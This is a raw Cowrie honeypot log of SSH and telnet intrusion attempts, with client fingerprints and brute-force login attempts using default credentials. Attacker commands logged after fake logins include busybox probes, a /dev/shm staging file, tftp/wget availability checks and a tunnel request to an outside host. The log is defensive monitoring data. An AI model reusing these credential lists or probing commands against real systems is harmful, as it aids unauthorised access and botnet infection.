{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:58:55.040558Z","src_ip":"195.178.110.224","session":"44e41502c799"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T03:58:55.059882Z","src_ip":"195.178.110.224","session":"44e41502c799"}
{"eventid":"cowrie.login.failed","username":"solv","password":"12345678","message":"login attempt [solv/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T03:58:55.121345Z","src_ip":"195.178.110.224","session":"44e41502c799"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:58:56.143700Z","src_ip":"195.178.110.224","session":"44e41502c799"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59590,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b830659ffda","protocol":"ssh","message":"New connection: 212.227.235.229:59590 (1.2.3.4:22) [session: 3b830659ffda]","sensor":"my-vps","timestamp":"2025-08-28T03:59:58.455922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:59:58.456501Z","src_ip":"212.227.235.229","session":"3b830659ffda"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:59:58.563463Z","src_ip":"212.227.235.229","session":"3b830659ffda"}
{"eventid":"cowrie.login.failed","username":"cyberpanel","password":"panel","message":"login attempt [cyberpanel/panel] failed","sensor":"my-vps","timestamp":"2025-08-28T03:59:58.885839Z","src_ip":"212.227.235.229","session":"3b830659ffda"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:59:59.995041Z","src_ip":"212.227.235.229","session":"3b830659ffda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37713,"dst_ip":"1.2.3.4","dst_port":23,"session":"9e44b7bcb22c","protocol":"telnet","message":"New connection: 212.227.235.229:37713 (1.2.3.4:23) [session: 9e44b7bcb22c]","sensor":"my-vps","timestamp":"2025-08-28T04:00:06.033164Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-28T04:00:06.807390Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.login.success","username":"root","password":"pass","message":"login attempt [root/pass] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:00:07.583315Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:00:07.681230Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-28T04:00:07.926137Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-28T04:00:07.928473Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-28T04:00:07.929502Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-28T04:00:07.930627Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-28T04:00:07.931281Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-28T04:00:07.931993Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox BPTVC","message":"CMD: cat /proc/mounts; /bin/busybox BPTVC","sensor":"my-vps","timestamp":"2025-08-28T04:00:08.177779Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox BPTVC","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox BPTVC","sensor":"my-vps","timestamp":"2025-08-28T04:00:08.427292Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox BPTVC","message":"CMD: tftp; wget; /bin/busybox BPTVC","sensor":"my-vps","timestamp":"2025-08-28T04:00:08.676277Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-28T04:00:08.924479Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-28T04:00:08.926504Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"/bin/busybox BPTVC","message":"CMD: /bin/busybox BPTVC","sensor":"my-vps","timestamp":"2025-08-28T04:00:09.172620Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-28T04:00:09.174428Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-28T04:00:09.176075Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-28T04:00:09.176968Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5a000683e1c8dc7f745aa868cff68a0fdd99327e08a1bd9ad39a93142de8106","size":3550,"shasum":"e5a000683e1c8dc7f745aa868cff68a0fdd99327e08a1bd9ad39a93142de8106","duplicate":false,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/e5a000683e1c8dc7f745aa868cff68a0fdd99327e08a1bd9ad39a93142de8106 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:00:09.178806Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.session.closed","duration":3.1498613357543945,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:00:09.182947Z","src_ip":"212.227.235.229","session":"9e44b7bcb22c"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":29530,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0210fe07428","protocol":"ssh","message":"New connection: 186.225.142.90:29530 (1.2.3.4:22) [session: c0210fe07428]","sensor":"my-vps","timestamp":"2025-08-28T04:00:40.339145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:00:40.836827Z","src_ip":"186.225.142.90","session":"c0210fe07428"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T04:00:40.837938Z","src_ip":"186.225.142.90","session":"c0210fe07428"}
{"eventid":"cowrie.login.success","username":"root","password":"088863222*!$#","message":"login attempt [root/088863222*!$#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:00:44.291354Z","src_ip":"186.225.142.90","session":"c0210fe07428"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:00:46.025300Z","src_ip":"186.225.142.90","session":"c0210fe07428"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T04:00:46.026046Z","src_ip":"186.225.142.90","session":"c0210fe07428"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:00:46.753129Z","src_ip":"186.225.142.90","session":"c0210fe07428"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:00:47.250159Z","src_ip":"186.225.142.90","session":"c0210fe07428"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55743,"dst_ip":"1.2.3.4","dst_port":23,"session":"555a3354bb4b","protocol":"telnet","message":"New connection: 212.227.235.229:55743 (1.2.3.4:23) [session: 555a3354bb4b]","sensor":"my-vps","timestamp":"2025-08-28T04:00:50.597446Z"}
{"eventid":"cowrie.session.closed","duration":12.52943730354309,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:01:03.126820Z","src_ip":"212.227.235.229","session":"555a3354bb4b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50938,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5bf7805e59a","protocol":"ssh","message":"New connection: 217.72.205.35:50938 (1.2.3.4:22) [session: e5bf7805e59a]","sensor":"my-vps","timestamp":"2025-08-28T04:01:13.473616Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:01:13.474850Z","src_ip":"217.72.205.35","session":"e5bf7805e59a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:01:34.751677Z","src_ip":"212.227.235.229","session":"9a2bc2d2ac8e"}
{"eventid":"cowrie.session.closed","duration":180.23473691940308,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:01:34.758991Z","src_ip":"212.227.235.229","session":"9a2bc2d2ac8e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37756,"dst_ip":"1.2.3.4","dst_port":23,"session":"5f3fa6cd5092","protocol":"telnet","message":"New connection: 212.227.235.229:37756 (1.2.3.4:23) [session: 5f3fa6cd5092]","sensor":"my-vps","timestamp":"2025-08-28T04:03:34.398324Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:03:34.606938Z","src_ip":"212.227.235.229","session":"5f3fa6cd5092"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:03:34.688924Z","src_ip":"212.227.235.229","session":"5f3fa6cd5092"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T04:03:34.691021Z","src_ip":"212.227.235.229","session":"5f3fa6cd5092"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T04:03:34.692154Z","src_ip":"212.227.235.229","session":"5f3fa6cd5092"}
{"eventid":"cowrie.session.connect","src_ip":"211.230.173.218","src_port":48173,"dst_ip":"1.2.3.4","dst_port":23,"session":"e6899f51839a","protocol":"telnet","message":"New connection: 211.230.173.218:48173 (1.2.3.4:23) [session: e6899f51839a]","sensor":"my-vps","timestamp":"2025-08-28T04:04:15.210589Z"}
{"eventid":"cowrie.session.closed","duration":30.412510633468628,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:04:45.623029Z","src_ip":"211.230.173.218","session":"e6899f51839a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58175,"dst_ip":"1.2.3.4","dst_port":22,"session":"06e108da2845","protocol":"ssh","message":"New connection: 212.227.125.160:58175 (1.2.3.4:22) [session: 06e108da2845]","sensor":"my-vps","timestamp":"2025-08-28T04:05:34.519455Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:05:34.520476Z","src_ip":"212.227.125.160","session":"06e108da2845"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58429,"dst_ip":"1.2.3.4","dst_port":22,"session":"fafba7aaa800","protocol":"ssh","message":"New connection: 212.227.125.160:58429 (1.2.3.4:22) [session: fafba7aaa800]","sensor":"my-vps","timestamp":"2025-08-28T04:05:34.633414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:05:34.634052Z","src_ip":"212.227.125.160","session":"fafba7aaa800"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T04:05:34.749530Z","src_ip":"212.227.125.160","session":"fafba7aaa800"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:05:35.097664Z","src_ip":"212.227.125.160","session":"fafba7aaa800"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T04:05:35.213996Z","session":"fafba7aaa800"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63163,"dst_ip":"1.2.3.4","dst_port":22,"session":"085a1f8b2726","protocol":"ssh","message":"New connection: 212.227.125.160:63163 (1.2.3.4:22) [session: 085a1f8b2726]","sensor":"my-vps","timestamp":"2025-08-28T04:06:07.307131Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:06:07.308127Z","src_ip":"212.227.125.160","session":"085a1f8b2726"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:06:07.406705Z","src_ip":"212.227.125.160","session":"085a1f8b2726"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora","message":"login attempt [aurora/aurora] failed","sensor":"my-vps","timestamp":"2025-08-28T04:06:07.854642Z","src_ip":"212.227.125.160","session":"085a1f8b2726"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora1","message":"login attempt [aurora/aurora1] failed","sensor":"my-vps","timestamp":"2025-08-28T04:06:08.945338Z","src_ip":"212.227.125.160","session":"085a1f8b2726"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora123","message":"login attempt [aurora/aurora123] failed","sensor":"my-vps","timestamp":"2025-08-28T04:06:10.034452Z","src_ip":"212.227.125.160","session":"085a1f8b2726"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora1234","message":"login attempt [aurora/aurora1234] failed","sensor":"my-vps","timestamp":"2025-08-28T04:06:11.122531Z","src_ip":"212.227.125.160","session":"085a1f8b2726"}
{"eventid":"cowrie.login.failed","username":"aurora","password":"aurora12345","message":"login attempt [aurora/aurora12345] failed","sensor":"my-vps","timestamp":"2025-08-28T04:06:12.235564Z","src_ip":"212.227.125.160","session":"085a1f8b2726"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:06:13.650717Z","src_ip":"212.227.125.160","session":"085a1f8b2726"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39184,"dst_ip":"1.2.3.4","dst_port":22,"session":"49189701283f","protocol":"ssh","message":"New connection: 212.227.235.229:39184 (1.2.3.4:22) [session: 49189701283f]","sensor":"my-vps","timestamp":"2025-08-28T04:06:30.289832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:06:30.290679Z","src_ip":"212.227.235.229","session":"49189701283f"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T04:06:30.396384Z","src_ip":"212.227.235.229","session":"49189701283f"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-28T04:06:30.824786Z","src_ip":"212.227.235.229","session":"49189701283f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:06:31.934096Z","src_ip":"212.227.235.229","session":"49189701283f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:06:34.693293Z","src_ip":"212.227.235.229","session":"5f3fa6cd5092"}
{"eventid":"cowrie.session.closed","duration":180.3006887435913,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:06:34.698925Z","src_ip":"212.227.235.229","session":"5f3fa6cd5092"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:06:44.633986Z","src_ip":"212.227.125.160","session":"fafba7aaa800"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21979,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6bbe1097fa0","protocol":"ssh","message":"New connection: 212.227.125.160:21979 (1.2.3.4:22) [session: a6bbe1097fa0]","sensor":"my-vps","timestamp":"2025-08-28T04:07:21.692303Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:07:21.693117Z","src_ip":"212.227.125.160","session":"a6bbe1097fa0"}
